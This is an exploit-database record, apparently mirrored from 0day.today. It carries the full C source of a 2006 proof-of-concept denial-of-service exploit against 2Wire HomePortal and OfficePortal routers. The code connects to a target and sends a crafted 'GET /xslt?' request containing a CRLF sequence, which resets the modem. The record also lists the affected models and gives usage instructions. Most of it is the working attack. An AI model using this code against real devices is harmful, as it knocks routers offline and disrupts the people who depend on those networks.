DATABASE RESOURCES PRICING ABOUT US

{"id": "1337DAY-ID-6197", "type": "zdt", "bulletinFamily": "exploit", "title": "2WIRE Modems/Routers CRLF Denial of Service Exploit", "description": "Exploit for hardware platform in category dos / poc", "published": "2006-08-22T00:00:00", "modified": "2006-08-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/6197", "reporter": "preth00nker", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-03-14T02:44:57", "viewCount": 4, "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "sourceHref": "https://0day.today/exploit/6197", "sourceData": "===================================================\r\n2wire Modems/Routers CRLF Denial of Service Exploit\r\n===================================================\r\n\r\n\r\n\r\n//Vulnerable: \t\r\n//2Wire OfficePortal 0\r\n//2Wire HomePortal 1500W\r\n//2Wire HomePortal 100W\r\n//2Wire HomePortal 100S\r\n//2Wire HomePortal 1000W\r\n//2Wire HomePortal 1000SW\r\n//2Wire HomePortal 1000S\r\n//2Wire HomePortal 1000\r\n//2Wire HomePortal 0\r\n////////////////////////////////// [ STARTING CODE ]\r\n////////////////////////////////////////////////////\r\n////\r\n//// [ Explanation ] this PoC make an evil_request\r\n//// and send to the server , when the server process\r\n//// it the request fall him, AND THE MODEM WILL RESET!.\r\n////\r\n//// [ Note ] This Poc was coded using Dev-C++ 4.9.9.2\r\n//// If you have any error with the librarys you need\r\n//// include libws2_32.a at the project.\r\n////\r\n//// Enjoy it n_nU!..\r\n//// Coded by preth00nker (using Mexican skill!)\r\n\r\n#pragma comment(lib,\"libws2_32.a\")\r\n#include <string.h> \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include \"winsock2.h\"\r\n\r\nunsigned long dir;\r\nchar h[]=\"\";\r\nshort port;\r\nchar badreq[]=\"\";\r\nint state;\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n printf(\"\\n################################################\\n\");\r\n printf(\"####\\n\");\r\n printf(\"#### PoC of DoS 2wire_Gateway\\n\");\r\n printf(\"#### By Preth00nker\\n\");\r\n printf(\"#### http://www.mexhackteam.org\\n\");\r\n printf(\"####\\n\");\r\n printf(\"####\\n\\n\");\r\n if (argc<4){\r\n printf(\"[Usage] %s $Host $Port $Variable\\n\",argv[0]);\r\n printf(\"\\n[I.E.] %s 192.168.1.254 80 PAGE\\n\",argv[0]);\r\n return 0;\r\n }\r\n //Crear socket\r\n WSADATA wsaData;\r\n WSAStartup(MAKEWORD(2,2),&wsaData);\r\n SOCKET wsck;\r\n //Estructuras\r\n struct sockaddr_in Wins;\r\n struct hostent *target;\r\n //Wins\r\n Wins.sin_family=AF_INET;\r\n Wins.sin_port=htons((short)atoi(argv[2]));\r\n target=gethostbyname(argv[1]);\r\n Wins.sin_addr.s_addr=inet_addr(inet_ntoa(*(struct in_addr *)target->h_addr));\r\n //llamamos al socket\r\n wsck=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,(int unsigned)NULL,(int unsigned)NULL,(int unsigned)NULL);\r\n //Verifica por error\r\n if (wsck==SOCKET_ERROR){printf(\"Error al crear el socket =!..\");WSACleanup();return 0;}\r\n printf(\"Socket creado correctamente!.. hWndl: %d\",wsck);\r\n //Conecta\r\n if(WSAConnect(wsck,(SOCKADDR*)&Wins,sizeof(Wins),NULL,NULL,NULL,NULL)==SOCKET_ERROR){\r\n WSACleanup();\r\n return 0;\r\n printf(\"\\nError al conectar =!..\");\r\n }\r\n printf(\"\\nConectado!..\");\r\n //Make a bad query and send it ..Mwajuajua!..\r\n strcat(badreq,\"GET /xslt?\");\r\n strcat(badreq,argv[3]);\r\n strcat(badreq,\"=%0D%0A HTTP/1.0\\r\\n\");\r\n strcat(badreq,\"Accept-Language: es-mx\\r\\n\");\r\n strcat(badreq,\"User-Agent: MexHackTeam\\r\\n\");\r\n strcat(badreq,\"Host: \"); \r\n strcat(badreq,argv[1]);\r\n strcat(badreq, \"\\r\\n\\r\\n\\r\\n\");\r\n send(wsck , badreq ,(int)strlen(badreq), 0);\r\n printf(\"\\nDatos Mandados!..\");\r\n //finalized\r\n Sleep(100);\r\n printf(\"\\nThat's all, Check this out!...\\n\");\r\n WSACleanup();\r\n return 0;\r\n}\r\n//////////////////////////////////////////// [ EOF ]\r\n////////////////////////////////////////////////////\r\n\r\n\r\n\n# 0day.today [2018-03-14] #", "_state": {"dependencies": 1646774101}}

{}